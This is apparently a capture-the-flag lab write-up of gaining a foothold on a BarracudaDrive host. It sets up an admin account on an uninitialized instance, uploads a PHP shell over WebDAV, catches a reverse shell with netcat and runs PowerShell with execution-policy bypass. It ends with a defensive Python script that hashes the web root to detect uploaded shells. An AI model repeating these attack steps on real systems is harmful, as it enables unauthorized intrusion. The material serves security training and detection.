Arbitrary File Upload
The target BarracudaDrive instance is accessible over two separate ports: port 8000 for HTTP and port 44330 for HTTPS. A critical issue has been identified: the instance has not been properly initialized, which allows unauthenticated users to create an administrative account.
BarracudaDrive includes a web file server that exposes the filesystem to clients over WebDAV. Given the privileges associated with an administrator account, an attacker can use this to upload arbitrary files directly to the target's filesystem, potentially leading to further compromise of the environment.
dav:/fs/C/> cd xampp/htdocs
dav:/fs/C/xampp/htdocs/> ls
Listing collection `/fs/C/xampp/htdocs/': succeeded.
index.html 887 Nov 3 2020
phpinfo.php 21 Nov 3 2020
script.js 3023 Nov 3 2020
styles.css 1266 Nov 3 2020
The C:\xampp\htdocs directory appears to be the web root for the PHP quiz app on ports 45332 and 45443.
dav:/fs/C/xampp/htdocs/> put shell.php
Uploading shell.php to `/fs/C/xampp/htdocs/shell.php':
Progress: [=============================>] 100.0% of 9296 bytes succeeded.
Successfully uploaded the payload to the C:\xampp\htdocs directory.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ curl -s http://$IP:45332/shell.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ curl -s http://$IP:45443/shell.php
Invoking..
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.156.127] 50326
SOCKET: Shell has connected! PID: 1792
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\xampp\htdocs> whoami
medjed\jerren
PS C:\xampp\htdocs> hostname
medjed
PS C:\xampp\htdocs> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.156.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.156.254
Initial foothold established on the target system as the jerren user via arbitrary file upload.
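As an added defender-side example (not part of the original writeup), the following Python script baselines a web root such as C:\xampp\htdocs with SHA-256 digests and flags any added or modified file the server would execute as code, which is exactly the change a WebDAV PUT of shell.php produces. The web root contents and the uploaded file are constructed stand-ins.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed baseline: the four files from the C:\xampp\htdocs listing above;
# in practice the manifest is generated at deploy time and stored off-host.
BASELINE_FILES = {
    "index.html": "<html><body>quiz</body></html>",
    "phpinfo.php": "<?php phpinfo(); ?>",
    "script.js": "console.log('quiz');",
    "styles.css": "body { margin: 0; }",
}
# Suffixes Apache/PHP would execute; a new file with one of these is the alert.
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(webroot: Path) -> dict:
    """Map each file (path relative to the webroot) to its SHA-256 digest."""
    return {p.relative_to(webroot).as_posix(): sha256_file(p)
            for p in webroot.rglob("*") if p.is_file()}

def diff_webroot(webroot: Path, manifest: dict) -> dict:
    """Compare the live webroot against the stored manifest and single out
    added or modified files the server would execute (the shell.php case)."""
    current = build_manifest(webroot)
    added = sorted(set(current) - set(manifest))
    removed = sorted(set(manifest) - set(current))
    modified = sorted(p for p in current if p in manifest and current[p] != manifest[p])
    suspicious = sorted(p for p in added + modified
                        if Path(p).suffix.lower() in EXECUTABLE_SUFFIXES)
    return {"added": added, "modified": modified, "removed": removed, "suspicious": suspicious}

def demo() -> dict:
    """Stage the constructed webroot, snapshot it, then simulate the upload."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = Path(tmp)
        for name, body in BASELINE_FILES.items():
            (webroot / name).write_text(body)
        manifest = build_manifest(webroot)  # snapshot taken before the upload
        # Stand-in for the file that arrived via the WebDAV PUT in the writeup
        (webroot / "shell.php").write_text("<?php /* constructed placeholder */ ?>")
        return diff_webroot(webroot, manifest)
```

Running the same diff on a schedule, or on a filesystem-change event, turns the upload step of this writeup into an alert before the first curl request reaches the file.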